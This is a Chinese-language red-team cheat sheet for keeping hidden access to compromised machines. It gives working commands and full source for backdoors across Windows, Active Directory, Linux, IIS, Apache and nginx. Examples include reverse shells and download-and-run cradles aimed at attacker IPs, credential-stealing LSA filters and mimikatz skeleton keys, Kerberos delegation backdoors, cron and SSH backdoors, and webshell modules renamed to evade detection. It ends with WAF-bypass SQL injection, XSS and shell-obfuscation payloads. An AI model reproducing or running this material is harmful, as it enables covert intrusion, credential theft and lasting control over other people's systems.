DDL事件触发
>powershell -exec bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1')
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马文件可用CS/Empire生成
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance " zone\sub2k8" -Remove 移除后门
http://www.nssm.cc/release/nssm-2.24.zip
NSSM封装可执行程序为系统服务
>nssm install 服务名称会自动弹出设置
Path选择powershell的路径,arguments直接输入参数。
启动服务
>nssm start 服务名称
会上线
重启电脑,权限也会维持
删除服务
>nssm remove <servicename>
https://github.com/secretsquirrel/SigThief
>python sigthief.py -i 被窃取的文件 -t 要添加签名的恶意文件 -o 保存文件
>python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll
Meterpreter> run metsvc -A
在C:Windows\TEMP下随机生成目录三个文件,创建服务metsvc 31337端口
连接后门
Msf>use exploit/multi/handler
Msf>set payload windows/metsvc_bind_tcp
Msf>set rhost 192.168.1.2
Msf>set rport 31337
Msf>run
删除服务
Meterpreter > run metsvc –r
Meterpreter>run persistence -X -i 10 -r 192.168.1.9 -p 4444
-X系统启动时运行
-i每隔10秒尝试连接服务端
连接后门
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
Msf>set lhost 192.168.1.1
Msf>set lport 4444
Msf>run
使用VS2015开发环境,MFC设置为在静态库中使用MFC
编译工程,生成HookPasswordChange.dll
https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
在代码尾部添加如下代码:
>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
并命名为HookPasswordChangeNotify.ps1
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll
管理员权限执行
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
C:\Windows\Temp下可以找到passwords.txt
&
https://gitee.com/RichChigga/PasswordchangeNotify
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll 管理员权限执行:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
在C:\Windows\System32 新建文件system.ini第一行是连接的ip 第二行是端口
https://github.com/3gstudent/PasswordFilter
visualstudio生成解决方案
DLL放在%windir%\system32\下
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa下的Notification Packages,添加Win32Project3
>REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f
重启之后只要修改用户的密码,即可记录
文件默认在C盘根目录,可在源码中修改
每隔30秒加载一次payload
>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
>wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23",CommandLineTemplate="远程调用(powershell,regsvr32,mshta等)"
>wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
重启维持
卸载后门
>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
https://gitee.com/RichChigga/WMI-Persistence
cobalt strike ->payload generator->powershell(use x64)
attack->文件下载,文件选择payload generator的脚本,local uri为随意文件
生成后地址替换进WMI-Persistence脚本内
# powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI 重启后即可上线system权限(要等待4-6分钟)
自定义上线
attack->文件下载,exe木马指定为文件。local uri为随意文件,wmi.xsl放在web目录
修改wmi.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete",0);
]]> </ms:script>
</stylesheet>
WMI-Persistence脚本修改payload地址为wmi.xsl
$finalPayload=" wmic os get /FORMAT:`"$Payload`""
>powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
PS > Remove-Persistence 删除模块
重启后即可上线
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"
> powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"
使用ADS创建一个隐藏文件,创建一个计划任务每隔一分钟请求一次攻击。
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"
生成 >msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=12138 -f powershell -o /var/www/html/ads #use exploit/multi/handler #set payload windows/x64/meterpreter/reverse_https #run
指定宿主文件,index.php是网页正常文件
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
<?php include(‘index.php:hidden.jpg’)?>
<?php
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
$b="a";
include(PACK('H*',$$b))
?>
>echo 9527 > 1.txt:flag.txt
>notepad 1.txt:flag.txt
或不指定宿主文件
>echo hide > :key.txt
>cd ../
>notepad test:key.txt
上传处绕过
上传的文件名 | 服务器表面现象 | 生成的文件内容 |
---|---|---|
test.php:a.jpg | 生成test.php | 空 |
test.php::$DATA | 生成test.php | |
test.php::$INDEX_ALLOCATION | 生成test.php文件夹 | \ |
test.php::$DATA\0.jpg | 生成0.jpg |
创建一个txt文件,test.txt,随便添加内容(实际的工具,即用户要用的那个工具)。
将程序写入文件流(此处用calc.exe)
>type calc.exe > test.txt:calc.exe
使用mklink创建文件链接:
>mklink config.txt test.txt:calc.exe
创建readme.txt,文件内容随便。设置为隐藏。
创建readme.js,内容如下:
var objShell = new ActiveXObject("shell.application");
objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);
objShell.ShellExecute("README.txt", "", "", "open", 1);
执行readme.js,运行calc.exe ,打开readme.txt
Empire
Empire> set Host http://192.168.1.150
Empire> set Port 8080
>launcher powershell Listener's Name
生成后只使用Base64的代码。
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript Base64编码"
清除后门
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"
Empire>powershell/persistence/elevated/wmi
需高权限
重启失效
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
登录的账号密码保存在
C:\Windows\System32\mimilsa.log
重启有效
将mimikatz中的mimilib.dll放入system32目录
>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注册表
>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 添加mimilib
有账号登录密码保存在C:\Windows\System32\kiwissp.log重启也有效
复制mimilib.dll到system32文件夹中
>shell copy mimilib.dll C:\Windows\System32\
使用模块
>usemodule persistence/misc/install_ssp*
>set Path C:\Users\Administrator\mimilib.dll
>Import-Module .\PowerSploit.psm1
>Install-SSP -Path .\mimilib.dll
域的组策略和脚本存放在域控机的C:\Windows\SYSVOL\sysvol\zone.com\Policies目录,域内机器定时访问以更新策略
域控机设置policies为everyone完全控制
>cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne":f
使用powerview查询域内机对应策略文件
PS> Get-NETGPO -ComputerName sub2k8.zone.com |fl gpcfilesyspath
打开C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf末尾添加
[Registry Values] MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe [Version] signature="$CHICAGO$" Revision=1
手动刷新策略
>gpupdate /force
劫持taskhost.exe,可替换c:\windows\system32\calc.exe为后门文件或语句。
当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin
域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt
或使用rubeus.exe
破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
域控执行,寻找具备SPN且密码永不过期的账户
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}
使用mimikatz的dcsync提取用户hash
>lsadump::dcsync /domain:zone.com /user:y
布置后门
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount 账户
布置完成后利用,登录账户y
触发后门
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
注入票据,获取域控的CIFS、LDAP服务
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt
http://192.168.0.107/ps/nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1
新增一个受限委派服务账户,或添加受限委派后门功能给一个已知账户密码存在的服务账户。
需运行在域控制器上,本次演示的是新建后门账户,若是给已知账户密码的服务账户添加功能,步骤一致。
PS > Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com
密码默认为Password@123!可以修改脚本中$Password参数修改密码。
https://github.com/samratashok/ADModule
导入ADModule中的Microsoft.ActiveDirectory.Management.dll和Import-ActiveDirectory.ps1
>Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
>Import-Module Import-ActiveDirectory.ps1
现以域内普通用户y登录一台域内机器sub2k8,使用kekeo获取TGT
Kekeo#tgt::ask /user:backdoor /domain:zone.com /password:Passowrd@123!
Kekeo#tgs::s4u /tgt:TGT_backdoor@ZONE.COM_krbtgt~zone.com@ZONE.COM.kirbi /user:godadmin@zone.com /service:ldap/dc.zone.com获取以域管理身份访问ldap的TGS
使用mimikatz写入TGS票据
mimikatz#kerberos::ptt C:\Users\y.ZONE\Desktop\kekeo\x64\TGS_godadmin@zone.com@ZONE.COM_ldap~dc.zone.com@ZONE.COM.kirbi
接下来就可以dcsync导出krbtgt的hash,通过krbtgt伪造黄金票据
mimikatz#lsadump::dcsync /user:krbtgt /domain:zone.com
域控上使用mimikatz执行
>privilege::debug
>misc::skeleton
可以使用域内任何账号以密码mimikatz登录任意域内主机
使用Empire模块
>usemodule persistence/misc/skeleton_key*
绕过LSA Protection
>privilege::debug
>!+
>!processprotect /process:lsass.exe /remove
>misc::skeleton
>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe
只有当107这台机器连接时可获得shell,其他机器不可以。
>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
安装strace
#apt-get install strace
#vi ~/.bashrc
添加
alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'
>ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
执行后开启31337端口,使用root任意密码登录
>ssh root@192.168.1.1 -p 31337
http://cymothoa.sourceforge.net/
靶机>./cymothoa -p 进程PID -s 1 -y 端口
攻击机>nc -vv ip 端口
#cd /usr/sbin
#mv sshd ../bin
#echo '#!/usr/bin/perl' >sshd
#echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
#echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
#chmod u+x sshd
#/etc/init.d/sshd restart
攻击机执行
>socat STDIO TCP4:192.168.0.110:22,sourceport=13377
>cp /bin/bash /tmp/tmp
>chmod u+s /tmp/tmp
>/tmp/tmp -p
>vim /etc/ssh/sshd_conf取消以下注释
>ssh-keygen生成
复制/root/.ssh/id_rsa.pub文件到攻击端的/root/.ssh/authorized_keys
>ssh -i id_rsa targer@1.1.1.1
https://github.com/f0rb1dd3n/Reptile
安装
>apt install build-essential libncurses-dev linux-headers-$(uname -r)
>git clone https://github.com/f0rb1dd3n/Reptile.git
http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
version - 0 : 2.6.18 (RHEL/CentOS 5.x)
1 : 2.6.32 (Ubuntu 10.x) [default version]
修改配置config.h
安装路径、日志路径、端口、连接密码、连接用户
./setup build
攻击机连接
>telnet 192.168.1.1 13377
下载
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
备份配置文件
>mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
>mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
安装关联文件
centos
>yum install -y openssl openssl-devel pam-devel zlib zlib-devel
Ubuntu
>apt-get install -y openssl libssl-dev libpam0g-dev
>tar zxvf openssh-5.9p1.tar.gz
>tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
>cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
>cd openssh-5.9p1
>patch <sshbd5.9p1.diff
>vim includes.h
/tmp/ilog记录登录到本机的用户密码
/tmp/olog记录本机登录其他机器的账户密码
日志文件前可以加个.隐藏起来
SECRETPW是连接后门密码
查看当前版本
>ssh -V
修改version.h改为当前版本
编译安装
Centos7
>./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
>make clean
>make && make install
>systemctl restart sshd.service
ubuntu
>./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam
>make clean
>make&&make install
重启服务,修改文件日志
>touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
>touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config
清除痕迹
>export HISTFILE=/dev/null
>export HISTSIZE=0
>export HISTFILESIZE=0
>sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history
>iptables -t nat -N LETMEIN
>iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# 开启开关
>iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# 关闭开关
>iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
>iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
攻击端:
#开启复用
>echo threathuntercoming | socat - tcp:192.168.0.110:80
#ssh使用80端口进行登录
ssh -p 80 root@192.168.0.110
#关闭复用
echo threathunterleaving | socat - tcp:192.168.0.110:80
>chattr +I shell.sh
>vim .shell.sh
>attrib +s +h +r 1.txt
>touch -r 1.file 2.file 修改2file文件的时间跟1file时间相同
From:https://github.com/WBGlIl/IIS_backdoor
IIS_backdoor_dll.dl放入 web 目录的 bin 文件夹中配置 web.config 文件
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<modules>
<add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
</modules>
</system.webServer>
</configuration>
IIS_backdoor_shell.exe执行命令
使用IISBackdoor太明显,容易被看出是后门,这里对后门改名
重新生成解决方案,dll放入bin目录,web.config修改为
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<modules>
<add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
</modules>
</system.webServer>
</configuration>
添加完之后会自动在模块中注册好
执行payload,msf生成raw格式payload,选择shellcode选项,raw文件拖入即可
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw
From:https://github.com/Ivan1ee/NetDLLSpy
原作者提及三种方式,第一种编译代码为DLL新建aspx文件实例化后门类来执行命令,第二种是做httphandler映射可指定一个后缀执行命令保存文件在web服务器上,再读取结果。第三种是使用jsc.exe编译js脚本生成dll,添加映射菜刀连接。
这里根据原作者的代码,进行了一下简单的修改,修改后的功能为添加httphandler映射指定一个后缀执行命令显示在页面上,不用保存在服务器中再访问。
代码
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
public class Handler : IHttpHandler
{
public bool IsReusable
{
get
{
return false;
}
}
public void ProcessRequest(HttpContext context)
{
string input = context.Request.Form["InternetInformationService"]; //command
if (context.Request.Form["microsoft"] == "iis")//do command
{
this.cmdShell(input);
}
}
public void cmdShell(string input)
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.Arguments = "/c " + input;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
StreamReader output = process.StandardOutput;
String result = output.ReadToEnd();
output.Close();
output.Dispose();
HttpContext.Current.Response.Write(result);
}
}
}
保存为随意后缀,使用csc编译。
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
Web.config文件添加
<system.webServer>
<handlers>
<add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
</handlers>
</system.webServer>
打开IIS管理器,可以看到处理映射管理器中已经添加了模块。
现在随意访问个xxx后缀的文件
带参数访问
microsoft=iis&InternetInformationService=net user
第三种连接菜刀,这里也对代码修改了一下。
import System;
import System.Web;
import System.IO;
package IsapiModule
{
public class Handler implements IHttpHandler
{
function IHttpHandler.ProcessRequest(context : HttpContext)
{
context.Response.Write("404 Not Found")
var I = context;
var Request = I.Request;
var Response = I.Response;
var Server = I.Server;
eval(context.Request["Internet"]); //pass
}
function get IHttpHandler.IsReusable() : Boolean{ return true}
}
}
使用jsc编译
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
编辑web.config,添加映射,这里指定的后缀是.iis
<system.webServer>
<modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/>
<staticContent>
<mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
<handlers>
<add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
</handlers>
</system.webServer>
已自动加入了映射。现在随便访问个iis后缀的文件。
可使用菜刀直接连接
From:https://github.com/0x09AL/IIS-Raid
在vs2019下编译
在Functions.h中修改连接密码,passfile是dump下来的密码保存的位置,com_header是后门和服务器通信的请求头。
打开项目修改完你的密码,直接ctrl+B生成解决方案即可(这里生成的是release版本)
Dll传到服务器,改个名字,执行添加模块
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
在模块中可以看到已经存在了
远程连接
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
执行命令的方式是
>cmd +命令
Dump命令可以dump下来IIS站点的登录的信息,保存在设置的位置。
Inject可以执行shellcode
Cs/msf生成raw格式的shellcode
>inject 位置
From:https://www.freebuf.com/articles/web/172753.html
https://github.com/rebeyond/memShell
当获取一个webshell或bashshell权限时,下载后门执行注入进程形成无文件复活后门
下载后解压到任意web目录
得到2个jar文件
执行,password设置为你的密码
>java -jar inject.jar password
注入成功,在web任意页面任意url执行命令
http://192.168.0.121:8080/css/app.css?pass_the_world=password
可执行命令,反弹shell,上传/下载文件,列目录,读文件,添加代理,连接菜刀
From:https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA
https://github.com/QAX-A-Team/HideShell
把自己的shell和hideshell传入靶机,先访问自己的shell,目的是为了让 Tomcat 将它编译,并生成 JspServletWrapper 保存在 JspRuntimeContext 中。
再访问hideshell.jsp,点击hide你的shell。
已经隐藏了
再访问hideshell.jsp,可以看到隐藏后的shell的文件名。
访问看看
当然,也可以把hideshell自身隐藏了,那访问它的方式就是hidden-hideshell.jsp
目录里啥都没了
此方式隐藏之后请求不会产生日志
那如果把shelltest文件夹删掉权限还会在吗?
是在的
From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor
生成模板结构
>apxs -g -n auth
编辑mod_auth.c文件
#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"
#include "ap_config.h"
#include <stdio.h>
#include <stdlib.h>
static int auth_handler(request_rec *r)
{
const apr_array_header_t *fields;
int i;
apr_table_entry_t *e = 0;
char FLAG = 0;
fields = apr_table_elts(r->headers_in);
e = (apr_table_entry_t *) fields->elts;
for(i = 0; i < fields->nelts; i++) {
if(strcmp(e[i].key, "Authorizations") == 0){
FLAG = 1;
break;
}
}
if (FLAG){
char * command = e[i].val;
FILE* fp = popen(command,"r");
char buffer[0x100] = {0};
int counter = 1;
while(counter){
counter = fread(buffer, 1, sizeof(buffer), fp);
ap_rwrite(buffer, counter, r);
}
pclose(fp);
return DONE;
}
return DECLINED;
}
static void auth_register_hooks(apr_pool_t *p)
{
ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);
}
module AP_MODULE_DECLARE_DATA auth_module = {
STANDARD20_MODULE_STUFF,
NULL, /* create per-dir config structures */
NULL, /* merge per-dir config structures */
NULL, /* create per-server config structures */
NULL, /* merge per-server config structures */
NULL, /* table of config file commands */
auth_register_hooks /* register hooks */
};
编译后重启apache
>apxs -i -a -c mod_auth.c && service apache2 restart
原文件接受的头是backdoor太明显,这里换成了Authorizations
或使用python来执行
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import sys
def exploit(host, port, command):
headers = {
"Authorizations": command
}
url = "http://%s:%d/" % (host, port)
response = requests.get(url, headers=headers)
content = response.content
print content
def main():
if len(sys.argv) != 3:
print "Usage : "
print "\tpython %s [HOST] [PORT]" % (sys.argv[0])
exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
while True:
command = raw_input("$ ")
if command == "exit":
break
exploit(host, port, command)
if __name__ == "__main__":
main()
Apache Module后门2
From:https://github.com/VladRico/apache2_BackdoorMod
.load文件传入/etc/apache2/mods-available/目录,.so文件传入/usr/lib/apache2/modules/目录
启动后门模块,重启apache
>a2enmod backdoor&service apache2 restart
Cookie里添加字段password=backdoor
访问http://ip/ping返回如下图说明后门正常允许
访问http://ip/bind/12345 开启正向连接,攻击机执行nc ip 12345即可
访问http://ip/revtty/192.168.0.107/12138 开启反向连接,攻击机109执行nc监听12138即可
访问http://ip/proxy/1337开启socks代理
想要结束socks代理可执行
>echo "imdonewithyou" |nc 192.168.0.111 1337
即可结束socks代理
以上原作者的文件命名backdoor太明显,可以自己修改文件重新编译
创建模板结构命名为phpmodev
修改cookie内容为迷惑字段Authorizations=PHPSESSIONID
From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7
生成模板结构
>apxs -g -n phpdevmod
编辑mod_phpdevmod.c文件
编译
>make -e CC=x86_64-linux-gnu-g++
生成的.so文件在/.libs目录下
将其复制到/usr/lib/apache2/modules/目录
修改/etc/apache2/mods-enabled/php7.0.load文件,添加如下
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg> #可以设置为任何不存在的文件
setHandler phpdevmod
</Location>
需重启apache服务
访问后门方式http://ip/qq.jpg?命令的url编码
直接访问后门文件
636174202F6574632F706173737764为cat /etc/passwd的url编码
From:https://github.com/netxfly/nginx_lua_security
https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md
后门利用的前提是获取到root权限,nginx安装有lua模块。
在nginx.conf中http节处添加,指定lua脚本位置,以及nginx启动时加载的脚本
在lua目录/waf/中新建Init.lua,内容如下,require nginx表示加载nginx.lua中的模块。
/waf/目录中新建nginx.lua实现执行命令,参数为waf。
在nginx配置文件中加入location。
效果:
From:https://github.com/t57root/pwnginx
解压好后编译客户端
>make
编辑nginx的源文件/src/core/nginx.c找到configure arguments:在后面添加--prefix=/usr/local/nginx\n指定的是nginx安装的目录
重新编译nginx添加后门模块
>./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module
>make
覆盖新的nginx到原nginx目录
>cp -f objs/nginx /usr/local/nginx/sbin/nginx
重启nginx
>killall nginx&/usr/local/nginx/sbin/nginx
连接
>./pwnginx shell 目标机 nginx端口 密码
默认密码是t57root,密码的配置文件在pwnginx-master\module\config.h文件夹中,可在重新编译nginx前修改密码
此后门也可开启socks隧道
命令explorer.exe / root与cmd.exe / c类似,只不过使用explorer会破坏进程树,会创建新实例explorer.exe,使之成为新实例下的子进程
Xss和注入bypass mod_security
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... –
<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5—
%75%6e%69on = union
%73%65%6cect = select
%75%6e%69 = uni = url encode
%73%65%6c = sel = url encode
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
https://github.com/FlameOfIgnis/Pwdb-Public
从网上泄露的10亿条数据中整理出的。里面257,669,588被筛选为损坏的数据或测试账户。
10亿个凭据可归结为168,919,919密码和393,386,953用户名.
平均密码长度为9.4822个字符
12.04%包含特殊字符,28.79%密码仅是字母,26.16%仅是小写,13.37%仅是数字,8.83%的密码仅被发现一次
与rockyou的对比,rockyou包含14,344,391个密码,本字典与rockyou相差80%
还有根据不同国家生成的小字典
From: @shreyasrx
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
cat /et${neko}c/pas${poi} swd
*echo "dwssap/cte/ tac" | rev
$(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d)
w\ho\am\i
/\b\i\n/////s\h
who$@ami
xyz%0Acat%20/etc/passwd
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}